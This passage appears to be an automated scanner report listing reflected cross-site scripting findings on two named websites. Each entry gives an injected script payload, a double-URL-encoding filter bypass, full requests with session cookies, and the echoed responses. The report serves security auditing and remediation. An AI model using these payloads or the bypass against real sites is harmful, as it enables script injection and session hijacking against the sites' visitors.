<link href="/news/mishaps-a-rescues?575f4"><script>alert(1)</script>c6b2abc3a30=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.904. http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/sailing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24feb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e96ffec7c22a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 24feb"><script>alert(1)</script>96ffec7c22a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/sailing?24feb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e96ffec7c22a=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/sailing?24feb"><script>alert(1)</script>96ffec7c22a=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.905. http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/todays-top-stories

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7919d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cd07914ed6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7919d"><script>alert(1)</script>5cd07914ed6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/todays-top-stories?7919d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cd07914ed6=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/todays-top-stories?7919d"><script>alert(1)</script>5cd07914ed6=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.906. http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /resources

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb978%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8bf595a39d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb978"><script>alert(1)</script>a8bf595a39d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /resources?fb978%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8bf595a39d=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/resources?fb978"><script>alert(1)</script>a8bf595a39d=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.907. http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /site-map

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17af3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2f10cb93dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17af3"><script>alert(1)</script>2f10cb93dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-map?17af3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2f10cb93dd=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/site-map?17af3"><script>alert(1)</script>2f10cb93dd=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.908. http://www.soundingsonline.com/subscription-services [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9451c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c5155b61bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9451c"><script>alert(1)</script>3c5155b61bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /subscription-services?9451c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c5155b61bf=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/subscription-services?9451c"><script>alert(1)</script>3c5155b61bf=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.909. http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/preview-current-issue

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4df85%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb520f082cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4df85"><script>alert(1)</script>bb520f082cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /subscription-services/preview-current-issue?4df85%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb520f082cd=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/subscription-services/preview-current-issue?4df85"><script>alert(1)</script>bb520f082cd=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.910. http://www.zvents.com/ [376e5%22%3E%3Cscript%3Ealert(1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /

Issue detail

The value of the 376e5%22%3E%3Cscript%3Ealert(1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afd8e"><script>alert(1)</script>bb5d19de2cf was submitted in the 376e5%22%3E%3Cscript%3Ealert(1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?376e5%22%3E%3Cscript%3Ealert(1afd8e"><script>alert(1)</script>bb5d19de2cf HTTP/1.1
Host: www.zvents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 04:48:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 33
ETag: "1996f06a2e07b0675d817a21c21d6f9e"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; path=/; expires=Fri, 29-Apr-2011 04:48:08 GMT; HttpOnly
Content-Length: 62918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?376e5%22%3E%3Cscript%3Ealert(1afd8e"><script>alert(1)</script>bb5d19de2cf" />
...[SNIP]...

4.911. http://www.zvents.com/ [376e5%22%3E%3Cscript%3Ealert(document.cookie parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /

Issue detail

The value of the 376e5%22%3E%3Cscript%3Ealert(document.cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb4e6"><script>alert(1)</script>1714e2f256f was submitted in the 376e5%22%3E%3Cscript%3Ealert(document.cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?376e5%22%3E%3Cscript%3Ealert(document.cookiefb4e6"><script>alert(1)</script>1714e2f256f HTTP/1.1
Host: www.zvents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 04:48:27 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 34
ETag: "983e4d4869c500313b472ca776606e37"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; path=/; expires=Fri, 29-Apr-2011 04:48:27 GMT; HttpOnly
Content-Length: 62974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?376e5%22%3E%3Cscript%3Ealert(document.cookiefb4e6"><script>alert(1)</script>1714e2f256f" />
...[SNIP]...

4.912. http://www.zvents.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afd62"><script>alert(1)</script>659b6a21bfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?afd62"><script>alert(1)</script>659b6a21bfe=1 HTTP/1.1
Host: www.zvents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 04:48:30 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 30
ETag: "ec47c2b56e06d226fbb0ee0a0d0fa4a1"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; path=/; expires=Fri, 29-Apr-2011 04:48:30 GMT; HttpOnly
Content-Length: 62790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?afd62"><script>alert(1)</script>659b6a21bfe=1" />
...[SNIP]...

4.913. http://www.zvents.com/albany-ny/events [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.zvents.com
Path:   /albany-ny/events

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de173"><a>1d1177c0c73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /albany-nyde173"><a>1d1177c0c73/events HTTP/1.1
Host: www.zvents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 04:49:15 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 148
ETag: "3ca747f019156d48c7cd6ff3a402b354"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexEiCWNpdHkiC0FsYmFueSILcmFkaXVzaVAiDWxhdGl0dWRlZho0Mi42NTI1NzkyOTk5OTk5OTkAxfYiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU2MjMxNzAwMDAwMDAxAOy0IhF3aGVyZV9zdHJpbmdAFCIMYWRkcmVzcyIjYWxiYW55LW55ZGUxNzMiPjxhPjFkMTE3N2MwYzczIgpzdGF0ZSIHTlk%3D--4942d3b29882f1c14f2c13d6a8c32454e08563a2; path=/; expires=Fri, 29-Apr-2011 04:49:15 GMT; HttpOnly
Content-Length: 54379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-nyde173"><a>1d1177c0c73/events" />
...[SNIP]...

4.914. http://www.zvents.com/albany-ny/events [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /albany-ny/events

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46253"><script>alert(1)</script>561e7e31c43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-ny/events?46253"><script>alert(1)</script>561e7e31c43=1 HTTP/1.1
Host: www.zvents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 04:48:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 52
ETag: "65871602adf14b5ae97e610f643c644e"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uew4iCWNpdHkiC0FsYmFueSILcmFkaXVzaVAiDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmciD0FsYmFueSwgTlkiCnN0YXRlIgdOWQ%3D%3D--51f4096067c2ce5072e1ca3c5f593268f1df8d3d; path=/; expires=Fri, 29-Apr-2011 04:48:25 GMT; HttpOnly
Content-Length: 54385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-ny/events?46253"><script>alert(1)</script>561e7e31c43=1" />
...[SNIP]...

4.915. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.doubleclick.net.57389.9231.302br.net
Path:   /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

